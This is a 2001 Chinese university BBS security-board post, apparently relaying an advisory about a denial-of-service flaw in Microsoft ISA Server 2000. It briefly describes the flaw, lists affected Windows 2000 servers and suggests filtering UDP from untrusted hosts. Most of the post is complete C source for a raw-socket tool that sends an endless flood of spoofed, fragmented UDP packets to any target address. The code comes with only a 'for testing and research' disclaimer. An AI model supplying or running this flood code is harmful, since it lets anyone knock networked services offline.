荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: michaelx (水并不是这样灌的), 信区: Security
标 题: Microsoft ISA Server 拒绝服务漏洞
发信站: 荔园晨风BBS站 (Wed Nov 7 15:28:20 2001), 转信
Microsoft ISA Server 拒绝服务漏洞 (MS,缺陷)
涉及程序:
Microsoft ISA Server
描述:
大量的 UDP 碎片包可以导致 ISA 服务器崩溃
详细:
Microsoft ISA Server 是一款企业级的代理服务器和防火墙产品。该软件存在一个安全
问题,可能导致该软件拒绝服务。
通过发送大量的UDP碎片包到ISA服务器,可以导致MICROSOFT ISA服务器消耗100%的CPU
时间,导致服务崩溃。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
/*
Rootshell License
LICENSE: THIS PROGRAM MAY BE FREELY DISTRIBUTED AS LONG AS THE CONTENTS OF
THIS FILE ARE NOT MODIFIED.
This file may not be posted on AntiOnline (http://www.antionline.com) or
AntiCode (http://www.anticode.com). Their staff has a history of removing
all traces of Rootshell copyright notices on code that we write. Please
report any violations of this policy to Rootshell.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
#define FIX(n) (n)
#else
#define FIX(n) htons(n)
#endif
#define IP_MF 0x2000
#define IPH 0x14
#define UDPH 0x8
#define PADDING 0x0
#define MAGIC 0x3
#define COUNT 0x1
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, i, rip_sock, x=1, id=1;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one,
sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 2) usage(argv[0]);
if (!(dst_ip = name_resolve(argv[1])))
{
exit(1);
}
srandom((unsigned)(time((time_t)0)));
fprintf(stderr, "Sending fragmented UDP flood.\n");
for (;;) {
x ++;
src_ip = x*10;
src_prt = x*10;
dst_prt = x+1*10;
if (x>10)
x = 1;
for (i = 0; i < 10; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt, id++);
}
}
return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt, u_short id)
{
u_char *packet = NULL, *p_ptr = NULL;
u_char byte;
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45;
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2;
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
p_ptr += 2;
*((u_short *)p_ptr) = htons(id);
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF);
p_ptr += 2;
*((u_short *)p_ptr) = 247;
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4;
*((u_long *)p_ptr) = src_ip;
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip;
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt);
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt);
p_ptr += 2;
*((u_short *)p_ptr) = htons(8);
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr
*)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s dst_ip\n",
name);
exit(0);
}
影响的系统:
Microsoft ISA Server 2000
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Server
解决方案:
临时解决方案:
建议您在防火墙中过滤来自非信任主机的 UDP 包。
--
M.X的FTP SERVER
ftp://192.168.55.18
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.55.18]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店